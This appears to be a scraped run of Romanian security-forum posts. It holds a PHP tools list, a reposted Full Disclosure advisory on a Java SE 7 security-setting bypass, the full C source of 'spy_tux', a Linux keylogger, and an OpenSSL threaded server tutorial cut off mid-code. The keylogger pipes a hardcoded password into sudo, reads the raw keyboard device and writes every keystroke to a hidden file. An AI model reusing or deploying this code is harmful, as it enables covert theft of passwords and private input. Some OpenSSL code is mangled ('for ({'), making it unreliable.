Nytro

Si zici ca e facut de tine?

Citat: Q: "Why don't we see more attacks using these techniques?" A: "Dumb attacks work(for now)"

Online Tools si Online PHP Tools, am gasit cateva utile. [h=4]Online PHP functions[/h] strlen base64_encode base64_decode htmlspecialchars ip2long long2ip md5 crc32 nl2br sha1 str_rot13 urlencode urldecode addslashes stripslashes strip_tags trim pathinfo dirname basename date date_parse Trigonometric functions http://www.tools4noobs.com/online_tools/ http://www.tools4noobs.com/online_php_functions/

Genial

An issue with new Java SE 7 security features From: Security Explorations <contact () security-explorations com> Date: Sun, 27 Jan 2013 11:01:50 +0100 Hello All, According to Oracle's Java security head, the company has recently made "very significant" security improvements to Java, such as to prevent silent exploits. The problem is that "people don't understand those features yet" [1]. Starting from Java SE 7 Update 10 released in Oct 2012, a user may control the level of security that will be used when running unsigned Java apps in a web browser [2][3]. Apart from being able to completely disable Java content in the browser, the following four security levels can be used for the configuration of unsigned Java applications: - Low Most unsigned Java apps in the browser will run without prompting unless they request access to a specific old version of JRE or to protected resources on the system. - Medium Unsigned Java apps in the browser will run without prompting only if the Java version is considered secure. User will be prompted if an unsigned app requests to run on an old version of Java. - High User will be prompted before any unsigned Java app runs in the browser. If the JRE is below the security baseline, user will be given an option to update. - Very High Unsigned (sandboxed) apps will not run. Unfortunately, the above is only a theory. In practice, it is possible to execute an unsigned (and malicious!) Java code without a prompt corresponding to security settings configured in Java Control Panel. What we found out and what is a subject of a new security vulnerability (Issue 53) is that unsigned Java code can be successfully executed on a target Windows system regardless of the four Java Control Panel settings described above. Our Proof of Concept code that illustrates Issue 53 has been successfully executed in the environment of latest Java SE 7 Update 11 (JRE version 1.7.0_11-b21) under Windows 7 OS and with "Very High" Java Control Panel security settings. That said, recently made security "improvements" to Java SE 7 software don't prevent silent exploits at all. Users that require Java content in the web browser need to rely on a Click to Play technology implemented by several web browser vendors in order to mitigate the risk of a silent Java Plugin exploit. Thank you. Best Regards Adam Gowdiak --------------------------------------------- Security Explorations http://www.security-explorations.com "We bring security research to the new level" --------------------------------------------- References: [1] Oracle's Java security head: We will 'fix Java,' communicate better http://www.computerworld.com/s/article/9236230/Oracle_s_Java_security_head_We_will_fix_Java_communicate_better [2] Setting the Security Level of the Java Client http://docs.oracle.com/javase/7/docs/technotes/guides/jweb/client-security.html [3] Understanding the new security in Java 7 Update 11 by Michael Horowitz http://blogs.computerworld.com/cybercrime-and-hacking/21664/understanding-new-security-java-7-update-11 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ Sursa: Full Disclosure: [sE-2012-01] An issue with new Java SE 7 security features

E mai urat decat programele facute de mine Dar daca e facut de tine si cu Copy/Paste intreaga parte de "keylogging" e ok.

Si sursa, daca tot e open-source: /* *Author :Tharindra Galahena *Project:spy_tux - keylogger for linux *Date :29/07/2012 * * * * Copyright 2012 Tharindra Galahena * * This file is part of spy_tux. * * spy_tux is free software: you can redistribute it and/or modify it under the terms of * the GNU General Public License as published by the Free Software Foundation, either * version 3 of the License, or any later version. spy_tux is distributed in the hope * that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General * Public License for more details. * * You should have received a copy of the GNU General Public License along with spy_tux. * If not, see http://www.gnu.org/licenses/. * */ #include <stdio.h> #include <stdlib.h> #include <errno.h> #include <sys/types.h> #include <unistd.h> #include <linux/input.h> #include <pthread.h> #include <signal.h> #include <string.h> #include <sys/wait.h> //the path of your event file for the keybord. most probably it is the same a this #define event_path "/dev/input/event3" #define pass_word "god created a1pha and 0mega" //admin password of the computer #define data_file "/home/tharindra/.data" //path of the .data file #define keys_file "/home/tharindra/.keys" //path of the .keys file char keys[242][20]; FILE *data; pthread_mutex_t mutex; void print_stamp(){ time_t now; char *ti = (char *)malloc(100); time(&now); strcpy(ti, (char *)ctime(&now)); ti[strlen(ti) - 1] = '\0'; pthread_mutex_lock(&mutex); fprintf(data, "\n%s : ", ti); fflush(data); pthread_mutex_unlock(&mutex); free(ti); } void signal_heandle(){ print_stamp(); fprintf(data, "-------------------end------------------------\n"); fclose(data); exit(0); } void read_file(){ FILE *kf = fopen(keys_file, "r"); if(kf == NULL){ print_stamp(); fprintf(data, "ERROR : keys file missing\n"); exit(0); } char line[40]; int i; for(i = 0; fgets(line, 30, kf) > 0 && i < 242; i++){ line[strlen(line) - 1] = '\0'; strcpy(keys[i], line); } fclose(kf); } void *th(void *arg){ while(1){ print_stamp(); sleep(30); } } void keylog_init(){ int pfds[2]; int pfds2[2]; data = fopen(data_file, "a+"); if(pipe(pfds) == -1){ print_stamp(); fprintf(data, "ERROR : pipe error\n"); exit(0); } if(pipe(pfds2) == -1){ print_stamp(); fprintf(data, "ERROR : pipe error\n"); exit(0); } if (!fork()) { if (!fork()){ close(1); dup(pfds2[1]); close(pfds2[0]); execlp("echo", "echo", pass_word, NULL); }else{ wait(NULL); close(0); dup(pfds2[0]); close(1); dup(pfds[1]); close(pfds[0]); close(pfds2[1]); execlp("sudo", "sudo", "-S", "cat", event_path, NULL); } }else{ pthread_t pth; struct input_event *in; char *buff; pthread_mutex_init(&mutex, NULL); print_stamp(); fprintf(data, "------------------start-----------------------\n"); fflush(data); read_file(); pthread_create(&pth, NULL, th, NULL); while (1){ buff = (char *)malloc(sizeof(struct input_event) * 64); read (pfds[0], buff, sizeof(struct input_event) * 64); read (pfds[0], buff, sizeof(struct input_event) * 64); in = (struct input_event *)buff; if(in -> value < 241) { pthread_mutex_lock(&mutex); fprintf(data, "%s ", keys[in -> value]); fflush(data); pthread_mutex_unlock(&mutex); } free(buff); } } fflush(data); } int main(void){ if(!fork()){ signal(SIGINT | SIGPWR, signal_heandle); keylog_init(); }else{ printf("\n---spy_tux started!---\n"); } return 0; }

All-OS-OpenSSL-client-threaded-server-example Example-C OpenSSL client and server example EXAMPLE TEMPLATE PRODUCT: OpenSSL Version 0.9.8a 11 Oct 2005 OP/SYS: Windows XP SP2 OpenVMS Alpha V8.2 Linux Fedora Core 5 HP-UX 11i COMPONENT: OpenSSL run-time libraries and tools SOURCE: Philippe Vouters Fontainebleau/France LOW COST HIGH-TECH PRODUCTS: http://techno-star.fr DOWNLOAD LINKS: OpenSSL for OpenVMS (Itanium, Alpha, VAX) can be dowloaded from HP OpenVMS Systems OpenSSL for HP-UX can be downloaded from http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber=OPENSSL11I OpenSSL for Windows can be downloaded from OpenSSL - Download OpenSSL - SSL, TLS, and a cryptography library. Perl or Cygwin needed for Win32 compile. For you to simply execute the code showed hereafter, you may download: ../zip/bio_html.tar.gz OVERVIEW: This document shows a set of OpenSSL multi-threaded servers and a single-threaded client that demonstrate a way to secure TCP/IP traffic using OpenSSL encryption. Unlike conventional TCP/IP traffic, the OpenSSL traffic cannot be decoded even by Ethereal. The RSA key is checked by the servers and the X509 certificate is exchanged with the dedicated remote client in the following example. The sslserver.c code for OpenVMS, Unixes is also able to accept connections on user specified network IP interfaces. See its code in the main routine body part. *** CAUTION *** These sample programs have been tested using Linux Fedora Core 5, OpenVMS Alpha V8.2 and Windows XP and HP-UX B.11.11. However, we cannot guarantee its effectiveness because of the possibility of error in transmitting or implementing it. It is meant to be used as a template for writing your own programs, and may require modification for use on your system. PROGRAMS NOTES: On Windows: Add C:\openssl\include to the INCLUDE environment variable Add C:\openssl\lib to the LIB environment variable Add C:\openssl\bin to the PATH environment variable Enter the following command: C:\> nmake On Unix: $ gmake -f makefile_unix You can eventually do the following command prior to gmake: $ export USE_PTHREAD_KILL=yes Without this export, this uses the pthread_cancel()/pthread_testcancel() calls. You may also $ export BAD_PRACTICE=yes Running the code with this above export defined emits a warning. On OpenVMS: $ @makefile Use the following syntax to generate two pem files prior to executing the programs each on one terminal: On OpenVMS: $ openssl :== $SSL$EXE:openssl $ openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem - -config /ssl$root/openssl-vms.cnf Edit root.pem so that the first and last lines appear as follows if the above command is not generating the certificate header correctly: -----BEGIN CERTIFICATE----- -----END CERTIFICATE----- This should be done when using the following: $ openssl version OpenSSL 0.9.6g [engine] 9 Aug 2002 On Windows: C:\> openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem -config \openssl\apps\openssl.cnf The -config option is at least necessary under the following: C:\Documents and Settings\vouters>openssl version OpenSSL 0.9.7c 30 Sep 2003 Use the following command on Unix: $ openssl req -newkey rsa:1024 -x509 -keyout key.pem -out root.pem Generating a 1024 bit RSA private key ......................++++++ ..............................................++++++ writing new private key to 'key.pem' Enter PEM pass phrase:< this must match the const char *pass in sslserver.c or the #define PASSWORD in sslserver_windows.c > Verifying - Enter PEM pass phrase: ----- You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [GB]:<2 letters country mnemonic> State or Province Name (full name) [Berkshire]:<your State or Province> Locality Name (eg, city) [Newbury]:<your town's name> Organization Name (eg, company) [My Company Ltd]:<the name of your company> Organizational Unit Name (eg, section) []: Common Name (eg, your name or your server's hostname) []:localhost <-- < Important because bio_html request is https://localhost:60000/ > Email Address []:<your email address> Concatenate the two resultant files key.pem and root.pem into server.pem On Unix: $ cat key.pem root.pem > server.pem On VMS: $ copy/concatenate key.pem,root.pem server.pem On Windows: C:\> copy key.perm/A + root.pem/A server.pem/A Type the following on one terminal: Parameters between square brackets are optional. If no parameters are supplied the program binds to 0.0.0.0:60000. IP Interface optional parameter is the IPv4 IP address of the computer's network interface you wish to limit the traffic to. On Unix: $ ./sslserver [IP Interface1] ... [IP InterfaceN] [port] On OpenVMS: $ run sslserver or $ sslserver :== $disk:[directory]sslserver.exe $ sslserver [IP Interface1] ... [IP InterfaceN] [port] On Windows: C:\> sslserver_windows Do the following on another terminal on the same computer: On Unix: $ ./bio_html https://localhost:60000/ On Windows: C:\> bio_html https://localhost:60000/ On OpenVMS: $ bio_html :== $disk:[directory]bio_html.exe $ bio_html https://localhost:60000/ Instead of running the bio_html Web browser emulator, you may use any real Web browser and introduce the following URL: https://host:60000/ To check the certificate aspect, you may use the openssl provided client with the command: openssl s_client -connect localhost:60000 -state -showcerts ALGORYTHM: CLIENT SERVERS ___________________________________ TCP/IP connect ----------> TCP/IP accept SSL_connect ----------> SSL_accept SSL_write ----------> SSL_read SSL_read <---------- SSL_write (echo) SSL_read SSL_read two scenarios: either (case close SSL connection from the Web browser) BIO_free_all ----------> SSL_read returning 0 BIO_free_all (this shutdowns and closes the socket) or (socket activity timeout in the sslserver) SSL_read <---------- BIO_free_all SSL_shutdown close socket ADVISE: If you are running VMS or any Unix, you will need the sslserver.c. This code is over documented, hiding the actual code. With the commentss he got, the author of this article feels necessary to strongly document the solution. Also as the same C source file runs on many platforms having each different possibilities and constraints, there are lots of conditional preprocessing (all the #ifdef's). The best advise the author may give the reader is to preprocess this source file. You will then get a C source code containing only C statements that fits your own preprocess conditions. To solely use the preprocessor, you would: On Linux: $ cpp [-DUSE_PTHREAD_KILL [-DBAD_PRATICE]] -P sslserver.c sslserver.cc Each item surrounded by square brackets is optional. On OpenVMS systems: $ cc/preprocess=sslserver.cc/noline sslserver.c The output preprocessor file is sslserver.cc. You can edit view it from the bottom and climb lines up to the real start of this sslserver.c code. You will see how simple both OpenSSL and C phtreads programming can summarize using a supported or unsupported way that proves to work running it. To fully appreciate this summary with the preprocessor output, you must have a strong TCP/IP programming culture and not forget OpenSSL is based upon TCP/IP. You should as well possess a strong real-time programming culture on various Real-Time operating systems. The best profile is a programmer with 10 years programming experience whose job nature is either developping code or assisting developers. If you are used to concurrent programming on Windows, the algorythm of the Windows sslserver.c code below is an almost direct translation using Windows programming of the OpenSSL/pthreaded OpenVMS version because the run-time constraints are almost identical. MAKEFILES: ******** * VMS makefile.com ******** $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES sslserver.C $LINK/THREAD sslserver.OBJ,sys$input:/OPT SYS$LIBRARY:SSL$LIBCRYPTO_SHR32.EXE/SHARE SYS$LIBRARY:SSL$LIBSSL_SHR32.EXE/SHARE $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES bio_html.C $CC/POINTER_SIZE=32/PREFIX_LIBRARY_ENTRIES=ALL_ENTRIES encode.C $LINK bio_html.OBJ,encode.OBJ,sys$input:/OPT SYS$LIBRARY:SSL$LIBCRYPTO_SHR32.EXE/SHARE SYS$LIBRARY:SSL$LIBSSL_SHR32.EXE/SHARE $exit ******** * Windows XP Makefile ******** PROGRAM1=bio_html PROGRAM2=sslserver_windows DEFINES=/D "WIN32" /D "NDEBUG" /D "_CONSOLE" /D "_MBCS" CCFLAGS=/c /MD /W3 /GX /O1 /Tc LIBS=libeay32.lib ssleay32.lib kernel32.lib user32.lib advapi32.lib ws2_32.lib LDFLAGS=/LIBPATH:"\openssl\bin" /incremental:yes /subsystem:console OBJS=encode all: $(PROGRAM1).exe $(PROGRAM2).exe $(PROGRAM1).exe: $(PROGRAM1).c $(OBJS).obj cl $(DEFINES) $(CCFLAGS) $(PROGRAM1).c link $(LDFLAGS) $(PROGRAM1).obj $(OBJS) $(LIBS) $(PROGRAM2).exe: $(PROGRAM2).c $(OBJS).obj cl $(DEFINES) $(CCFLAGS) $(PROGRAM2).c link $(LDFLAGS) $(PROGRAM2).obj $(LIBS) $(OBJS).obj: $(OBJS).c cl $(DEFINES) $(CCFLAGS) $(OBJS).c clean: - if exist $(PROGRAM1).ilk del $(PROGRAM1).ilk - if exist $(PROGRAM1).obj del $(PROGRAM1).obj - if exist $(PROGRAM2).ilk del $(PROGRAM2).ilk - if exist $(PROGRAM2).obj del $(PROGRAM2).obj - if exist $(OBJS).obj del $(OBJS).obj ******** * Linux and HP-UX Makefile ******** PROGRAM1=bio_html PROGRAM2=sslserver DEFINES_HP-UX=-D_XOPEN_SOURCE_EXTENDED DEFINES_OSF1=-D_OSF_SOURCE=500 -D_XOPEN_SOURCE=500 DEFINES_Linux= CCFLAGS_HP-UX=-mt CCFLAGS_OSF1=-std -pthread CCFLAGS_Linux=-pthread LIBS_HP-UX=-lssl -lcrypto LIBS_Linux=-lssl -lcrypto LIBS_OSF1=-lssl -lcrypto LDFLAGS= OBJS=encode # OS= $(shell uname -a | awk '{print $$1}') CCFLAGS=$(CCFLAGS_$(OS)) LIBS=$(LIBS_$(OS)) DEFINES=$(DEFINES_$(OS)) # ifneq ($(USE_PTHREAD_KILL),) ifneq ($(BAD_PRACTICE),) DEFINES += -DBAD_PRACTICE endif DEFINES += -DUSE_PTHREAD_KILL endif all: $(PROGRAM1) $(PROGRAM2) $(PROGRAM1): $(PROGRAM1).c $(OBJS).o $(CC) -o $(PROGRAM1) $(DEFINES) $(CCFLAGS) $(OBJS).o $(LIBS) $(PROGRAM1).c $(PROGRAM2): $(PROGRAM2).c $(CC) -o $(PROGRAM2) $(DEFINES) $(CCFLAGS) $(LIBS) $(PROGRAM2).c $(OBJS).o: $(OBJS).c $(CC) -c $(OBJS).c clean: rm -f *.o $(PROGRAM1) $(PROGRAM2) *********** PROGRAMS: ******** * sslserver.c for Linux/HP-UX and OpenVMS ******** /* * ? Copyright 1976, 2005 Hewlett-Packard Development Company, L.P. * * Confidential computer software. Valid license from HP and/or * its subsidiaries required for possession, use, or copying. * * Consistent with FAR 12.211 and 12.212, Commercial Computer Software, * Computer Software Documentation, and Technical Data for Commercial * Items are licensed to the U.S. Government under vendor's standard * commercial license. * * Neither HP nor any of its subsidiaries shall be liable for technical * or editorial errors or omissions contained herein. The information * in this document is provided "as is" without warranty of any kind and * is subject to change without notice. The warranties for HP products * are set forth in the express limited warranty statements accompanying * such products. Nothing herein should be construed as constituting an * additional warranty. */ #include <errno.h> #include <sys/types.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> /* change hostent to comply with BSD 4.3 */ #include <arpa/inet.h> #include <pthread.h> #include <signal.h> #include <openssl/ssl.h> #include <openssl/err.h> #ifdef __VMS #include <unixio.h> #else #include <unistd.h> #endif #if defined (_XOPEN_SOURCE_EXTENDED) && defined (__hpux) #include <sys/byteorder.h> #endif #ifndef PTHREAD_STACK_MIN /* * PTHREAD_STACK_MIN is undefined on my SunOS V5.8 * likely due to out dated patches. */ #define PTHREAD_STACK_MIN 65535 #endif #if !defined (USE_PTHREAD_KILL) && defined (BAD_PRACTICE) /* * BAD_PRACTICE is only valid with USE_PTHREAD_KILL */ #undef BAD_PRACTICE #endif const int AUXSERVER_PORT=60000; const int MAX_MESSAGE_SIZE=50000; const char *KEYFILE="server.pem"; const char *CA_LIST="root.pem"; const char *HTML_PREFIX="HTTP/1.1 200 OK\n\ Content-Type:text/html\n\n\ <!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.01 Transitional//EN\">\n\ <HTML>\n\ <HEAD>\n\ <TITLE>sslserver echo</TITLE>\n\ <META HTTP-EQUIV=\"Content-Type\" CONTENT=\"text/html; charset=iso-8859-1\">\n\ </HEAD>\n\ <BODY>\n\ <PRE>\n"; const char *HTML_SUFFIX="</PRE>\n\ </BODY>\n\ </HTML>\n"; #if defined (__VMS) #define socklen_t unsigned int #endif /* * A printf is not guaranteed to be atomic on all systems. * Hence the ScreenMutex */ pthread_mutex_t ScreenMutex; const char *pass="password"; #if defined (BAD_PRACTICE) /* * The #warning preprocessor directive is Linux specific */ void warning(void){ printf ("******** WARNING **********\n"); #if defined (__osf__) printf ("pthread_sigmask has an undefined behavior in \ signal-handling functions on Tru64\n"); #endif printf("pthread_exit has an undefined behavior in signal-handling functions.\n\ It is better advised to not -DBAD_PRACTICE.\n\ This call in the context of this program appears to behave correctly on \n\ Linux FC5, HP-UX 11iV1, HP Tru64 V5.1B PK4\n"); printf ("\nRead comments in SIGUSR1_handler routine\n\n"); printf ("***************************\n"); } #endif static int password_cb(char *buf,int num,int rwflag, void *userdata) { if (num<strlen(pass)+1) return 0; strcpy(buf,pass); return(strlen(pass)); } typedef struct { int s; int http_request; SSL *ssl; BIO *sbio; char *message; pthread_t connection_thread; pthread_t watchdog_thread; #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) int signalled; /* to handle possible spurious wakeups */ pthread_mutex_t mutex; pthread_cond_t cond; #endif } arg_t; /* * Small error handling routine, that prints out the error, plus OpenSSL * relevant information upon why the call failed. */ void berr_exit(char *str){ fprintf(stderr,"%s\n",str); ERR_print_errors_fp(stderr); exit(EXIT_FAILURE); } void finish(void *ptr){ arg_t *arg =(arg_t *)ptr; int retval; /* * Shutdown SSL connection and close socket. */ if (arg->http_request) SSL_write(arg->ssl,HTML_SUFFIX,strlen(HTML_SUFFIX)); if (arg->message) free(arg->message); BIO_free_all(arg->sbio); /* * wait until watchdog thread has termined. * If the SSL_accept returns in error (because * one specify http instead of https), it calls * pthread_exit which will invoke this * finish routine. As the *arg is allocated in main * with a calloc, arg->watchdog_thread will be NULL. * Free used resources. */ if (arg->watchdog_thread){ /* * Unlocking a mutex which is unlocked can yield to * unpredictable results. The mutex is locked again * after the pthread_cond_timedwait and is * unlocked in case of timeout. */ #if defined (BAD_PRACTICE) /* * a pthread_kill on a pthread_cond_wait has an * undefined behavior regarding the mutex lock. */ pthread_mutex_trylock(&arg->mutex); #endif #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) pthread_mutex_unlock(&arg->mutex); #endif pthread_join(arg->watchdog_thread,NULL); } #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) pthread_mutex_destroy(&arg->mutex); pthread_cond_destroy(&arg->cond); #endif free(arg); } #if defined (BAD_PRACTICE) void SIGUSR1_handler(int sig){ /* * Here is a good description in the book THREADTIME * (see the REFERENCE section) * From CHAPTER 7 * Threads and Signals * Async-Signal Safe Thread Functions * 2nd paragraph. * =================== * * pp. 181: * * What is an async-signal safe function? It is a function that may be * invoked from a signal handler. No function should be considered * async-signal safe unless it is explicitly stated to be safe. * * None of the pthread_*() functions are async-signal safe. Do not call any * of these functions from within a signal handler. Initially, this may not * seem like a severe restriction. However, a thread may want to terminate * upon receipt of a specific signal. A thread cannot safely call * pthread_exit() from a signal handler. * ==================== * * See also: * * http://mailgate.supereva.com/comp/comp.programming.threads/msg12068.html * * From the following URL: * http://www.calpoly.edu/cgi-bin/man-cgi?sigaction+2 * * The following table defines a set of functions that are either * reentrant or not interruptible by signals. Therefore * applications may invoke them, without restriction, from * signal-catching functions: * * So what about adding the following small code before pthread_exit to prevent it * from being interruptible by signals ? sigset_t set; sigfillset(&set); sigprocmask(SIG_BLOCK,&set,NULL); * * On Linux FC5, the following is specified: * The use of sigprocmask() is unspecified in a multithreaded process; * see pthread_sigmask(3). * The (pthread_sigmask) function shall be equivalent to sigprocmask(), * without the restriction the call be made in a single-threaded process. * * On HP-UX, man sigprocmask specifies the following: * APPLICATION USAGE * Threads Considerations * Since each thread maintains its own blocked signal mask, sigprocmask() * modifies only the calling thread's blocked signal mask. * * For more information regarding signals and threads, refer to * signal(5). * * LWP (Lightweight Processes) Considerations * sigprocmask() modifies only the calling LWP's blocked signal mask. * * On Tru64 V5.1B, man 4 signal indicates: * * When signal-catching functions are invoked asynchronously with process exe- * cution, the behavior of some of the functions defined by this standard is * unspecified if they are called from a signal-catching function. The fol- * lowing set of functions are reentrant with respect to signals (that is, * applications can invoke them, without restriction, from signal-catching * functions): * * _exit() access() alarm() chdir() * chmod() chown() close() creat() * dup2() dup() exec() fcntl() * fork() fstat() getegid() geteuid() * getgid() getgroups() getpgrp() getpid() * getppid() getuid() kill() link() * lseek() mkdir() mkfifo() open() * pause() pipe() read() rename() * rmdir() sem_post() setgid() setpgrp() * setuid() sigaction() sigaddset() sigdelset() * sigfillset() siginitset() sigismember() signal() * sigpending() sigprocmask() sigsuspend() sleep() * statx() tcdrain() tcflow() tcflush() * tcgetattr() tcgetprgp() tcsendbreak() tcsetattr() * tcsetpgrp() time() times() umask() * uname() unlink() ustat() utime() * wait2() wait() write() * * All other system calls should not be called from signal-catching functions * since their behavior is undefined. * * Still on Tru64, man sigprocmask shows it acts on process whereas pthread_sigmask * acts on a thread. * How useful a pthread_kill can be on Tru64 unless it is used with a sigwait ??? */ sigset_t set; sigfillset(&set); #if defined (__hpux) sigprocmask(SIG_BLOCK,&set,NULL); #elif defined (__linux__) pthread_sigmask(SIG_BLOCK,&set,NULL); #elif defined (__osf__) pthread_sigmask(SIGBLOCK,&set,NULL); #endif pthread_exit(NULL); } /* * The pthread_cond_timedwait can be interrupted by a SIGUSR1 signal * from the the serve_connection thread. * This call is NOT async-signal safe. The pthread_exit inside the * SIGUSR1_handler also not being async-signal safe, this leads to an * undefined behavior on all Unixes including Linux. */ void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; struct timespec delta; struct timespec abstime; int ret; struct timeval tm; /* * On Unix systems the signal mask is inherited from its creator. * As we pthread_kill(this_thread,SIGUSR1), unblock this signal. */ sigset_t set; sigemptyset(&set); sigaddset(&set,SIGUSR1); pthread_sigmask(SIG_UNBLOCK,&set,NULL); delta.tv_sec=2; delta.tv_nsec=0; for ({ gettimeofday(&tm,NULL); abstime.tv_sec = delta.tv_sec+tm.tv_sec; abstime.tv_nsec = delta.tv_nsec+tm.tv_usec*1000; if (abstime.tv_nsec >= 1000000000){ ++abstime.tv_sec; abstime.tv_nsec -= 1000000000; } pthread_mutex_lock(&arg->mutex); /* * From HP-UX pthread_cond_timedwait man * Spurious wakeups may occur when waiting on * a condition variable. A spurious wakeup occurs when a thread returns * from a condition wait when it should really continue waiting. A normal * signal being delivered to a thread may cause a spurious wakeup during * a condition wait. Since the return values from pthread_cond_wait() * and pthread_cond_timedwait() do not imply anything about the value of * the predicate, the predicate should be re-evaluated. * */ ret=0; while ((!arg->signalled) && (ret==0)) ret=pthread_cond_timedwait(&arg->cond,&arg->mutex,&abstime); arg->signalled=0; /* * If timeout elapsed, just cancel the serve_connection thread * It shall do socket cleanups */ if (ret==ETIMEDOUT){ pthread_kill(arg->connection_thread,SIGUSR1); return(NULL); } pthread_mutex_unlock(&arg->mutex); } } #else /* Good pratice */ #if !defined (USE_PTHREAD_KILL) void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; struct timespec delta; struct timespec abstime; int ret; struct timeval tm; delta.tv_sec=2; delta.tv_nsec=0; for ({ gettimeofday(&tm,NULL); abstime.tv_sec = delta.tv_sec+tm.tv_sec; abstime.tv_nsec = delta.tv_nsec+tm.tv_usec*1000; if (abstime.tv_nsec >= 1000000000){ ++abstime.tv_sec; abstime.tv_nsec -= 1000000000; } pthread_mutex_lock(&arg->mutex); /* * From HP-UX pthread_cond_timedwait man * Spurious wakeups may occur when waiting on * a condition variable. A spurious wakeup occurs when a thread returns * from a condition wait when it should really continue waiting. A normal * signal being delivered to a thread may cause a spurious wakeup during * a condition wait. Since the return values from pthread_cond_wait() * and pthread_cond_timedwait() do not imply anything about the value of * the predicate, the predicate should be re-evaluated. */ ret=0; while ((!arg->signalled) && (ret==0)) ret=pthread_cond_timedwait(&arg->cond,&arg->mutex,&abstime); arg->signalled=0; /* * If timeout elapsed, just cancel the serve_connection thread * It shall do socket cleanups */ if (ret==ETIMEDOUT){ pthread_cancel(arg->connection_thread); return(NULL); } pthread_mutex_unlock(&arg->mutex); }/*end for */ } #else /* good practice and use pthread_kill */ void *connection_watchdog(void *ptr){ arg_t *arg =(arg_t *)ptr; /* * A good practice when using signals in multi-threaded application * is to use the pthread_kill/pthread_sigmmask/sigwait. No other calls * should be considered. * CAUTION: * Special care ought to be taken with such a method which indeed works * fine as long as there is one client of this threaded server. This is * because the SIGALRM signal raised by alarm in this case ought to be common * to all threads that run this code. The signal handling by Unix is very * likely not thread-safe, but only process-safe. */ sigset_t set; int sig; sigemptyset(&set); sigaddset(&set,SIGUSR1); sigaddset(&set,SIGALRM); sigaddset(&set,SIGUSR2); for({ alarm(2); sigwait(&set,&sig); alarm(0); switch (sig){ case SIGUSR2: continue; case SIGALRM: pthread_cancel(arg->connection_thread); case SIGUSR1: return(NULL); } } } #endif /* #else !defined (USE_PTHREAD_KILL) */ #endif /* else defined (BAD_PRACTICE) */ /* * This is our per socket thread. */ void *serve_connection (void *ptr){ arg_t *arg =(arg_t *)ptr; pthread_attr_t attr; int len=0; char *current_cipher_name; #if defined (__VMS) struct timeval timeout={0,10000}; fd_set rmask; #endif #if defined (BAD_PRACTICE) sigset_t set; /* * On Unix systems the signal mask is inherited from its creator. */ sigemptyset(&set); sigaddset(&set,SIGUSR1); #endif pthread_cleanup_push(finish,ptr); /* * initialize the synchronization pthread mutex * and condition. */ #if !defined (USE_PTHREAD_KILL) || defined (BAD_PRACTICE) /* * Synchronization needed for the pthread_cond_timedwait * These two calls must occur once the finish cleanup handler * has been established and before any pthread_exit/pthread_testcancel * or the creation of the watchdog timer which may pthread_kill this thread. * Doing this initialization here is safe. */ pthread_mutex_init(&arg->mutex,NULL); pthread_cond_init(&arg->cond,NULL); #endif /* * Complete the SSL connection from the remote peer. */ arg->sbio=BIO_new_socket(arg->s,BIO_CLOSE); SSL_set_bio(arg->ssl,arg->sbio,arg->sbio); /* * Choose the encryption algorythm by selecting a cipher. * As bio_html is a SSL V2 client, one must choose a sslv2 cipher. * To get available ciphers to choose for this application, enter the * command: * openssl ciphers -v -ssl2 * The DES-CBC3-MD5 cipher is a sslv2 cipher and can only be used * with a sslv2 client. * Here we let the client chose its cipher or have OpenSSL chose one * during the SSL_accept/SSL_connect negociation. */ /* if (SSL_set_cipher_list(arg->ssl,"DES-CBC3-MD5") <= 0) berr_exit("cipher could not be set"); */ /* * This server will send its X509 certificate to the client when the * connection is accepted, but using SSL_VERIFY_NONE, this program does * not require a certificate from the remote SSL peer. */ SSL_set_verify(arg->ssl,SSL_VERIFY_NONE,NULL); /* * Do accept the SSL connection. */ if ((len=SSL_accept(arg->ssl))<=0){ fprintf(stderr,"SSL accept error\n"); ERR_print_errors_fp(stderr); pthread_exit(NULL); } current_cipher_name=(char *)SSL_get_cipher_name(arg->ssl); pthread_mutex_lock(&ScreenMutex); printf("Using cipher %s\n",current_cipher_name); pthread_mutex_unlock(&ScreenMutex); /* * Start the connection activity watchdog. */ pthread_attr_init(&attr); /* * This call is not necessary as it is a default. However it is * there to highlight the fact we pthread_join the watchdog thread * in the finish cleanup handler. */ pthread_attr_setdetachstate(&attr,PTHREAD_CREATE_JOINABLE); pthread_create(&arg->watchdog_thread,&attr,connection_watchdog,arg); /* * endless loop waiting for activity on the socket. */ for ({ #if defined (__VMS) FD_ZERO(&rmask); FD_SET(arg->s,&rmask); /* * A select is usually cancelable on most Unix by a pthread_cancel. * Look at pthread man to ensure it is actually cancelable. * On Unixes, the code can be much simplified, withdrawing the need for * the select, as behind the SSL_read ought to be either a recv or read * eventually with a select which are all cancelable points on most * Unixes. * * On VMS, select/read/recv are not currently cancelable points. Hence, * for OpenVMS, the use of a select's timeout in order to execute the * portable pthread_testcancel() which will test a pending * pthread_cancel and will, via the pthread_cleanup_push/pop execute * the finish routine which closes the SSL link. * * The bio_html Web browser emulator or an actual Web browser such as * Firefox or Internet Explorer partner program blocking on a SSL_read * will therefore be unblocked, the SSL_read returning zero and * gracefully end. */ switch (select(arg->s+1,&rmask,NULL,NULL,&timeout)){ case 0: pthread_testcancel(); continue; case -1: perror("select"); pthread_exit(NULL); break; default: #elif !defined (__unix__) && !defined (__unix) #error "Unsupported operating system" #endif #if defined (USE_PTHREAD_KILL) && !defined (BAD_PRACTICE) /* * Unblock the sigwait with the 